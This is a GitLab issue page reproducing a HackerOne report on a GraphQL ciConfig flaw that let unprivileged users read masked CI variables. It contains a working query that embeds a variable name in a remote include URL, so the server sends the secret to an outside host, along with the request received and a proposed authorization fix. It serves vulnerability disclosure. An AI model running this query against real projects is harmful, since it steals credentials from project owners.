Skip to content
GitLab
Next
    • Why GitLab
    • Pricing
    • Contact Sales
    • Explore
  • Why GitLab
  • Pricing
  • Contact Sales
  • Explore
  • Sign in
  • Get free trial
  • GitLab.org GitLab.org
  • GitLab GitLab
  • Issues
  • #355738

Backend: Unallowed users can read masked CI variables of Gitlab projects

HackerOne report #1511133 by shells3c on 2022-03-14, assigned to @dcouture:

Report | How To Reproduce

Report

Summary

External users/users without privilege/guests (depends on project visibility) can access CI variables of a Gitlab project using GraphQL. The table below explains all situations that a user can access CI variables:

Project visibility Public Project Internal Project Private Project
External user Yes No No
User Yes Yes No
Guest Yes Yes Yes
Steps to reproduce
  1. Create a project, then create a masked CI variable in the project name PASSWORD, disable Protect variable and enable Mask variable
  2. From another account (no role in the project), run the following query in the GraphQL Explorer
{
  ciConfig(
    projectPath: "dcouture/public_project"
    content: "include: https://[redacted]/$VARIABLE_NAME.yaml"
  ) {
    errors
  }
}
  1. The server at example.com will receive the following request
GET /[YOUR PASSWORD HERE].yaml HTTP/1.0
Host: [redacted]
Connection: close
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: */*
User-Agent: Ruby
What is the current bug behavior?

GraphQL operation getCiConfigData loads all CI variables of the project including custom ones in the background

What is the expected correct behavior?

GraphQL operation getCiConfigData shouldn't be able to access project's custom variables

Output of checks

This bug happens on GitLab.com

Impact

Accessing CI variables, including sensitive masked variables of Gitlab projects without permission

Proposal

Update Resolvers::Ci::ConfigResolver to authorize using the create_pipeline policy.

Edited Jun 07, 2022 by Avielle Wolfe
Assignee
Assign to
Time tracking